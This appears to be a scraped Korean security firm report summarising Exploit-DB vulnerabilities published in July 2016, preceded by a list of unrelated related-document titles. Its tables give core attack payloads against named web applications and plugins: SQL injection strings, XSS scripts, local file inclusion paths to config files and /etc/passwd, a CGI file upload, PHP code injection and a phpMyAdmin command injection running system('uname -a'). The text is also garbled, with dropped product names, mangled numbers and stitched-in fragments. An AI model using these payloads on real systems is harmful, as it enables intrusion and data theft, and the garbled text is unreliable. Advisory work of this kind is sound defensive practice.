EDB 분석보고서 (06.07) ~ Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다 SQL Injection 하중 index.php SQL Injection 취

Similar documents
EDB 분석보고서 (04.06) ~ Exploit-DB( 에공개된별로분류한정보입니다. Directory Traversal users-x.php 4.0 -support-x.php 4.0 time-

76 XSS 하 Huge-IT Slider admin.php XSS

EDB 분석보고서 (04.03) ~ Exploit-DB( 에공개된별로분류한정보입니다. ** 5개이상발생한주요소프트웨어별상세 EDB 번호 종류 공격난이도 공격위험도 이름 소프트웨어이름 3037 SQL Inj

** 5 개이발생한주요소프트웨어별취약점세 EDB 번호취약점종류공격난이도공격위험도취약점이름소프트웨어이름

36802 Tune Library / 중 NEX-Forms < admin-ajax.php 하 중 Ultimate Product Catalogue - / 하 중 Ultimate Product Catalogue - ad

EDB 분석보고서 (06.03) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대프로그램대환경 File Upload 하 C

EDB 분석보고서 (0.0) 0.0.0~0.0. Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 SQL Injection 중상 Absolu

EDB 분석보고서 (05.0) ~ Exploit-DB( 에공개된별로분류한정보입니다 SQL Injection 하 상 u5cms localize.php SQL U5cms 3607 SQL

EDB 분석보고서 (04.09) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 SQL Injection Like Dislike Counter..3 Plugin - ajax_coun

날짜 EDB 번호취약점분류공격난이도공격위험도취약점이름핵심공격코드대프로그램대환경 Directory Traversal 하 EDB 분석보고서 (05.0) ~ Exploit-DB( 에공개된취약

EDB 분석보고서 (208.0) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 SQL Injection Smart Google Code Inserter < 3.5 P

POST /process.php HTTP/ XSS 중중 Command Injection 상상 EPESI.8.2 rev XSS ClipBucket Remote Code Execution

EDB 분석보고서 (06.0) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 PHP Imagick / command injection 취약점 /image.j

EDB 분석보고서 (05.08) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 7/08/ File Upload 하중.

EDB 분석보고서 (06.0) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB번호 분류 공격난이도 공격위험도 이름 핵심공격코드 대상프로그램 대상환경 /picosafe_webgui/webint

3장

ORANGE FOR ORACLE V4.0 INSTALLATION GUIDE (Online Upgrade) ORANGE CONFIGURATION ADMIN O

3708 하 중 Landing Pages Plugin post.php 3708 XSS 하 중 Landing Pages Plugin post-new.php 3707 하 중 NewStatPress Plugin admin.php 3707

<C0CCBCBCBFB52DC1A4B4EBBFF82DBCAEBBE7B3EDB9AE2D D382E687770>

?

품질검증분야 Stack 통합 Test 결과보고서 [ The Bug Genie ]

API STORE 키발급및 API 사용가이드 Document Information 문서명 : API STORE 언어별 Client 사용가이드작성자 : 작성일 : 업무영역 : 버전 : 1 st Draft. 서브시스템 : 문서번호 : 단계 : Docum

Analytics > Log & Crash Search > Unity ios SDK [Deprecated] Log & Crash Unity ios SDK. TOAST SDK. Log & Crash Unity SDK Log & Crash Search. Log & Cras

제목 레이아웃

Microsoft Word - SKINFOSEC-CHR-026- Mass SQL Injection 탐지 우회분석 보고서.doc

HTML5가 웹 환경에 미치는 영향 고 있어 웹 플랫폼 환경과는 차이가 있다. HTML5는 기존 HTML 기반 웹 브라우저와의 호환성을 유지하면서도, 구조적인 마크업(mark-up) 및 편리한 웹 폼(web form) 기능을 제공하고, 리치웹 애플리케이 션(RIA)을

12¿ù 1~30

Secure Programming Lecture1 : Introduction

DocsPin_Korean.pages

t

WEB Hacking 한국디지털미디어고등학교, T eampur e, JT JSOFT 장태 진

105È£4fš

<3132BFF93136C0CFC0DA2E687770>

XSS Attack - Real-World XSS Attacks, Chaining XSS and Other Attacks, Payloads for XSS Attacks

FileMaker 15 WebDirect 설명서

Observational Determinism for Concurrent Program Security

1217 WebTrafMon II

3월-기획특집1-4

歯MW-1000AP_Manual_Kor_HJS.PDF

<4D F736F F D2033BFF920BECBBEE0BFF9B0A3BAB8B0EDBCAD2E646F6378>

ODS-FM1

第 1 節 組 織 11 第 1 章 檢 察 의 組 織 人 事 制 度 등 第 1 項 大 檢 察 廳 第 1 節 組 대검찰청은 대법원에 대응하여 수도인 서울에 위치 한다(검찰청법 제2조,제3조,대검찰청의 위치와 각급 검찰청의명칭및위치에관한규정 제2조). 대검찰청에 검찰총장,대

UNIST_교원 홈페이지 관리자_Manual_V1.0

EDB 분석보고서 (05.03) ~ Exploit-DB( 에공개된별로분류한정보입니다 상 상 Spider FAQ - index.php 상 Gallery WD - index.php 36

Ext JS À¥¾ÖÇø®ÄÉÀ̼ǰ³¹ß-³¹Àå.PDF

텀블러514

목 록( 目 錄 )

02-1기록도전( )

03-1영역형( )

PowerPoint 프레젠테이션

ibmdw_rest_v1.0.ppt

10X56_NWG_KOR.indd

초보자를 위한 ADO 21일 완성

Week13

Eclipse 와 Firefox 를이용한 Javascript 개발 발표자 : 문경대 11 년 10 월 26 일수요일

ps

FMX M JPG 15MB 320x240 30fps, 160Kbps 11MB View operation,, seek seek Random Access Average Read Sequential Read 12 FMX () 2

문서 템플릿

untitled

C H A P T E R 2

Microsoft PowerPoint - web-part03-ch19-node.js기본.pptx

목 차 Ⅰ. 일반사항 1 Ⅱ. 특기사항 3 Ⅲ. 물품내역 및 세부규격 8 Ⅳ. 주의사항

<4D F736F F F696E74202D E20C0CEC5CDB3DD20C0C0BFEB20B9D720BCADBAF1BDBA20B1E2BCFA E >

s SINUMERIK 840C Service and User Manual DATA SAVING & LOADING & & /

4? [The Fourth Industrial Revolution] IT :,,,. : (AI), ,, 2, 4 3, : 4 3.

Portal_9iAS.ppt [읽기 전용]

ÀÎÅÍ³Ý ÁøÈï¿ø 5¿ù

PCServerMgmt7

3ÆÄÆ®-14

오늘날의 기업들은 24시간 365일 멈추지 않고 돌아간다. 그리고 이러한 기업들을 위해서 업무와 관련 된 중요한 문서들은 언제 어디서라도 항상 접근하여 활용이 가능해야 한다. 끊임없이 변화하는 기업들 의 경쟁 속에서 기업내의 중요 문서의 효율적인 관리와 활용 방안은 이

이제는 쓸모없는 질문들 1. 스마트폰 열기가 과연 계속될까? 2. 언제 스마트폰이 일반 휴대폰을 앞지를까? (2010년 10%, 2012년 33% 예상) 3. 삼성의 스마트폰 OS 바다는 과연 성공할 수 있을까? 지금부터 기업들이 관심 가져야 할 질문들 1. 스마트폰은

접근성과 웹 The power of the Web is in its universality. Access by everyone regardless of disability is an essential aspect. Tim Berners-Lee, the inventor

CD-RW_Advanced.PDF

PowerPoint 프레젠테이션

Microsoft Word - junior.docx

당사의 명칭은 "주식회사 다우기술"로 표기하며 영문으로는 "Daou Tech Inc." 로 표기합니다. 또한, 약식으로는 "(주)다우기술"로 표기합니다. 나. 설립일자 및 존속기간 당사는 1986년 1월 9일 설립되었으며, 1997년 8월 27일 유가증권시장에 상장되

VOL /2 Technical SmartPlant Materials - Document Management SmartPlant Materials에서 기본적인 Document를 관리하고자 할 때 필요한 세팅, 파일 업로드 방법 그리고 Path Type인 Ph

?

목순 차서 v KM의 현황 v Web2.0 의 개념 v Web2.0의 도입 사례 v Web2.0의 KM 적용방안 v 고려사항 1/29

thesis

< FC8A8C6E4C0CCC1F620B0B3B9DF20BAB8BEC8B0A1C0CCB5E5C3D6C1BE28C0FAC0DBB1C7BBE8C1A6292E687770>

SKINFOSEC-CHR-028-ASP Mssql Cookie Sql Injection Tool 분석 보고서.doc

구축환경 OS : Windows 7 그외 OS 의경우교재 p26-40 참조 Windows 의다른버전은조금다르게나타날수있음 Browser : Google Chrome 다른브라우저를사용해도별차이없으나추후수업의모든과정은크롬사용 한

2파트-07

컴퓨터과학과 교육목표 컴퓨터과학과의 컴퓨터과학 프로그램은 해당분야 에서 학문적 기술을 창의적으로 연구하고 산업적 기술을 주도적으로 개발하는 우수한 인력을 양성 함과 동시에 직업적 도덕적 책임의식을 갖는 IT인 육성을 교육목표로 한다. 1. 전공 기본 지식을 체계적으로

HLS(HTTP Live Streaming) 이용가이드 1. HLS 소개 Apple iphone, ipad, ipod의운영체제인 ios에서사용하는표준 HTTP 기반스트리밍프로토콜입니다. 2. HLS 지원대상 - 디바이스 : iphone/ipad/ipod - 운영체제 :

0. 들어가기 전

특허청구의 범위 청구항 1 게임 서버 또는 미들웨어에 의해, 사용자 단말기로부터, GPS 정보, IP 정보, 중계기 정보 중 적어도 하나를 이 용한 위치 정보와, 상기 사용자 단말기에 설정된 언어 종류를 포함하는 사용자 정보를 수신하는 단계; 상기 게임 서버 또는 미들

Orcad Capture 9.x

1

인도 웹해킹 TCP/80 apache_struts2_remote_exec-4(cve ) 인도 웹해킹 TCP/80 apache_struts2_remote_exec-4(cve ) 183.8

슬라이드 1

씨에이에스는 서울특별시 시설관리공단 계약 제1579호( ) 장애인 콜택시 콜센터 차량관제시스템 구축사업 감리용역 에 근거하여 카나스 에서 수행중인 장애인콜택시 콜센터 차량관제시스템 구축사업에 대한 최종감리를 실시하고 본 보고서를 제출합니다

untitled

untitled

내지무인화_

<3132BFF93136C0CFC0DA2E687770>

PowerPoint Template

data_ hwp

PowerPoint 프레젠테이션

Transcription:

분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) EDB 분석보고서 (06.07) 06.07.0~06.07.3 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 06 년 7 월에공개된 Exploit-DB 의분석결과, Cross Site Scripting 공격에대한취약점보고개수가가장많았으며공격패턴도다양하게발견되었습니다. 해당취약점들은일반적으로발생하는 Cross Site Scripting 취약점이아닌특정프로그램상에서만발생하는취약점들이대부분이었습니다. 주요소프트웨어별취약점발생현황을보면, 에서가장많은취약점이발견되었습니다. (* 에서발견된취약점들은 자체의문제가아닌특정 Plug-in 을사용할때발생할수있는취약점이대부분입니다.) 해당취약점들은 Parameter 의 Value 에삽입되는형식과더불어특정 header 를노리는취약점들이었습니다. 취약점이발견된프로그램및 Plug- in 을사용하는관리자는업데이트사항확인및빠른업데이트가요구되어집니다.. 취약점별보고개수 취약점 보고개수 Command Injection Code Injection File Upload LFI 3 SQL Injection 9 XSS 5 총합계 30 6 4 0 8 6 4 0 Command Injection 취약점별보고개수 Code Injection File Upload LFI SQL Injection XSS 3 9 5. 위험도별분류위험도 보고개수 백분율 상 6.67% 중 8 93.33% 합계 30 00.00% 위험도별분류 상 중 8 3. 공격난이도별현황공격난이도 보고개수 백분율 상 6.67% 중 7 3.33% 하 70.00% 총합계 30 00.00% 공격난이도별현황 7 상 중 하 4. 주요소프트웨어별취약점발생현황 소프트웨어이름 보고개수 5 5 5 3 IPS Community Suite CodoForum Tiki Wiki PaKnPost Django PhpMyAdmin PHP File Vault Joomla php Real Estate Script Streamo 총합계 30 주요소프트웨어별취약점발생현황 5 5 5 3 IPS Community Suite CodoForum Tiki Wiki PaKnPost Django PhpMyAdmin PHP File Vault Joomla php Real Estate Script

EDB 분석보고서 (06.07) 06.07.0~06.07.3 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 06-07-04 40058 SQL Injection 하중 0.5 - index.php SQL Injection 취약점 /ecardmaxdemo/admin/index.php?step=admin_show_key word&what=&row_number=0%0order%0by%0-- &search_year=06&page= 0.5 06-07-06 4006 SQL Injection 중중 Billing /admin/aomanage.php?search=&cat=status%0union System ().9.6 - %0select%0,,3,version%8%9,5,current_user,7,8, aomanage.php SQL Injection 취 9,0,,,3,4,5,6,7,8,9,0,--&list=3&so=status' 약점 ().9. 06-07-04 4005 SQL Injection 상상 POST / HTTP/. Chrome/6.0.9.75 Safari/535.7 Photostore 4.7.5 - /photostore/gallery/objects/4/ page/ SQL Injection 취약점 postgalleryform=&gallerysortby=media_id&gallerysortty pe=asc,(select 973 FROM(SELECT COUNT(*),CONCAT(0x776b6b7,(SELECT (ELT(973=973,))),0x778777,FLOOR(RAND(0)*))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Photostore 4.7.5 06-07-04 40058 XSS 하중 0.5 - index.php XSS 취약점 /ecardmaxdemo/admin/index.php?step=admin_member_d isplay&search_field=all&keyword=%3cscript%3ealert()% 3C%Fscript%3E&cmd_button=Search+User 0.5 06-07-04 4005 XSS 하중 Photostore 4.7.5 - workbox.php XSS 취약점 /photostore/workbox.php?mode=addtolightbox&mediaid = ><script>alert(/xss/)</script> Photostore 4.7.5 06-07-04 4005 XSS 하중 Photostore 4.7.5 - mgr.login.php XSS 취약점 /photostore/manager/mgr.login.php?username=demo&pa ssword='><script>alert("xss")</script><input type='hidden Photostore 4.7.5 06-07-06 4006 SQL Injection 중중 Billing System ().9.6 - hostingarchiveadmin.php SQL Injection 취약점 # /admin/hostingarchiveadmin.php?search=&cat=status UNION select --&list=&so=status' ().9.

EDB 분석보고서 (06.07) 06.07.0~06.07.3 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 06-07-06 40063 File Upload 하중 PaKnPost Pro.4 - select_.cgi File Upload 취약점 POST /cgi-bin/pnp/select_.cgi?sid=../../../cgi-bin/ HTTP/. Connection: CloseAccept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0) Content-Type: multipart/form-data; boundary=--------------- ------------7dd009908f -----------------------------7dd009908f Content-Disposition: form-data; name="file"; filename="pnp-test.txt.cgi" Content-Type: application/octet-stream PaKnPost PaKnPost Pro.4 -----------------------------7dd009908f-- 06-07-06 4006 XSS 중중 Billing System ().9.6 - cmanage.php XSS 취약점 POST /admin/cmanage.php HTTP/. Chrome/6.0.9.75 Safari/535.7 ().9. reason=%%3e%3cscript%3ealert%8%9%3c%f script%3e 06-07-06 4006 XSS 중중 Billing System ().9.6 - helpdesk.php XSS 취약점 POST /admin/helpdesk.php HTTP/. Chrome/6.0.9.75 Safari/535.7 ().9. hd_name="><script>alert()</script> 06-07-06 4006 XSS 중중 Billing System ().9.6 - omanage.php XSS 취약점 /omanage.php?search=%%3e%3cscript%3ealert% 83%9%3C/script%3E&cat=status%%3E%3Cscript% 3Ealert%84%9%3C/script%3E&list=4%%3E%3Csc ript%3ealert%8%9%3c/script%3e&so=status%% 3E%3Cscript%3Ealert%8%9%3C/script%3E ().9. 06-07-06 40065 XSS 하중 POST /serverserver-settings.jsp HTTP/. Chrome/6.0.9.75 Safari/535.7 3.0. - 4.0. - serverserver-settings.jsp XSS 취 약점 3.0. < 4.0. domain=%%f%3e%3cscript%3ealert%8%7xss %7%9%3C%Fscript%3E&remotePort=569&serverA llowed=add+server 06-07-06 40065 XSS 하중 3.0. - 4.0. - advance-user-search.jsp XSS 취약점 /plugins/search/advance-usersearch.jsp?search=true&moreoptions=false&criteria=admi n%/%3e%3cscript%3ealert%8%7xss%7%9% 3C/script%3E&search=Search 3.0. < 4.0. 06-07-06 40065 XSS 하중 POST /muc-service-edit-form.jsp HTTP/. Chrome/6.0.9.75 Safari/535.7 3.0. - 4.0. - mucservice-edit-form.jsp XSS 취약점 3.0. < 4.0. save=true&mucname=test&mucdesc=test%%f%3e% 3Cscript%3Ealert%8%7XSS- %7%9%3C%Fscript%3E

EDB 분석보고서 (06.07) 06.07.0~06.07.3 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 06-07-06 40065 XSS 하중 3.0. - 4.0. - searchprops-edit-form.jsp XSS 취약점 POST /plugins/search/search-props-edit-form.jsp HTTP/. Chrome/6.0.9.75 Safari/535.7 3.0. < 4.0. searchenabled=true&searchname=%/%3e%3cscript% 3Ealert('XSS')%3C/script%3E&groupOnly=false 06-07-06 40065 XSS 하중 3.0. - 4.0. - groupsummary.jsp XSS 취약점 /groupsummary.jsp?search=test%+onmouseover%3dalert% 8%7XSS%7%9+x%3D% 3.0. < 4.0. 06-07-04 40055 XSS 하중 Real3D FlipBook Plugin - flipbooks.php XSS 취약점 POST /wp-content/plugins/real3dflipbook/includes/flipbooks.php HTTP/. Chrome/6.0.9.75 Safari/535.7 Real3D FlipBook Plugin action=delete&bookid=<script>alert(/makman/)</script> 06-07-08 40078 SQL Injection 상중 /programs.php?id=999999.9%7%0union%0all%0s Streamo Online Radio And TV elect%0concat%80x7e%c0x7%cunhex%8hex% Streaming CMS - programs.php 8cast%8database%8%9%0as%0char%9%9 SQL Injection 취약점 %9%C0x7%C0x7e%9%C0x33033534383030 3536%0and%0%7x%7%3D%7x Streamo Streamo Online Radio And TV Streaming CM 06-07-08 40076 LFI 하중 POST /admin/ajax_cms/get_template_content/ HTTP/. php Real Estate Script 3 - Chrome/6.0.9.75 Safari/535.7 /admin/ajax_cms/get_template_ content/ LFI 취약점 php Real Estate Script php Real Estate Script 3 tpl=../../private/config/db.php GET / HTTP/. 06-07- 4008 XSS 하 중 All in One SEO Pack P User-Agent: Abonti </pre><script>alert();</script> All in One SEO Pack Plugin.3.6. 06-07- 40080 LFI 하중 Tiki Wiki CMS 5.0 - flv_stream.php LFI 취약점 /player/flv/flv_stream.php?file=../../../db/local.php&positio n=0 Tiki Wiki Tiki Wiki CMS 5.0

EDB 분석보고서 (06.07) 06.07.0~06.07.3 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 06-07- 40084 Code Injection 하중 IPS Community Suite 4...3 - in /index.php?app=core&module=system&controller= IPS Community content&do=find&content_class=cms\fields{}phpinfo();/* IPS Community Suite 4...3 06-07- 40083 XSS 하 중 POST /wp-login.php HTTP/. Chrome/6.0.9.75 Safari/535.7 Activity Log Plugin.3 X-Forwarded-For: <script>alert(document.cookie);</script> Activity Log Plugin.3. log=wordpress&pwd=sdsdssdsdsd&wpsubmit=log+in&redirect_to=http%3a%f%f9.68.8. 35%Fwp-admin%F&testcookie= 06-07-4 40 SQL Injection 하중 Joomla Guru Pro (com_guru) Component - index.php SQL Injection 취약점 /index.php?option=com_guru&view=gurupcategs&layout= view&itemid=%0and%0=--&lang=en Joomla Joomla Guru Pro (com_guru) Component 06-07-0 4037 SQL Injection 중 중 POST /wp-admin/adminajax.php?action=spiderveideoplayerselectplaylist HTTP/. Chrome/6.0.9.75 Safari/535.7 Video Player Plugin Video Player Plugin.5. search_events_by_title=&page_number=0serch_or_not=&as c_or_desc=&order_by=(case WHEN (SELECT sleep(0)) = THEN id ELSE title END) ASC #&option=com_spider_video_player&task=select_playlist& boxchecked=0&filter_order_playlist=&filter_order_dir_playli st= POST /index.php HTTP/. Content-Type: multipart/form-data; boundary=--------------- ------------7dd009908f -----------------------------7dd009908f Content-Disposition: form-data; name="to_field" 06-07-0 409 XSS 하중 Django CMS 3.3.0 - /en/admin/djangocms_snippet/s id nippet// XSS 취약점 -----------------------------7dd009908f Content-Disposition: form-data; name="name" Django Django CMS 3.3.0 test <img src="x">%0%0>"<iframe src="a">%0<iframe> "><"<img src="x">%0%0>"<iframe src=a><script>alet();</script><iframe> -----------------------------7dd009908f--

EDB 분석보고서 (06.07) 06.07.0~06.07.3 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 06-07-5 4050 SQL Injection 중중 CodoForum 3.. - index.php SQL Injection 취약점 /forum/index.php?u=/user/profile/%0and%0(select %0*(IF((SELECT%0*%0FROM%0(SELECT%0CO NCAT((MID((IFNULL(CAST(CURRENT_USER()%0AS%0C HAR),0x0)),,45))))s),%084467440737095560,%0 84467440737095560))) CodoForum CodoForum 3.. 06-07-6 4063 LFI 하중 PHP File Vault 0.9 - /htdocs/fileinfo.php LFI 취약점 /htdocs/fileinfo.php?sha=..%f..%f..%f..%f..%f.. %Fetc%Fpasswd PHP File Vault PHP File Vault 0.9 06-07-9 4074 SQL Injection 하중 Ultimate Product Catalog 3.9.8 - (do_shortcode via ajax) Blind SQL Injection POST /wordpress/wp-admin/adminajax.php?action=update_catalogue HTTP/. Chrome/6.0.9.75 Safari/535.7 Ultimate Product Catalog 3.9.8 id=+or+sleep(0)+--+ 06-07-9 4085 ommand Injectio 하 상 POST /tbl_find_replace.php HTTP/. Chrome/6.0.9.75 Safari/535.7 PhpMyAdmin 4.6. - tbl_find_repl PhpMyAdmin PhpMyAdmin 4.6. replacewith=system('uname -a');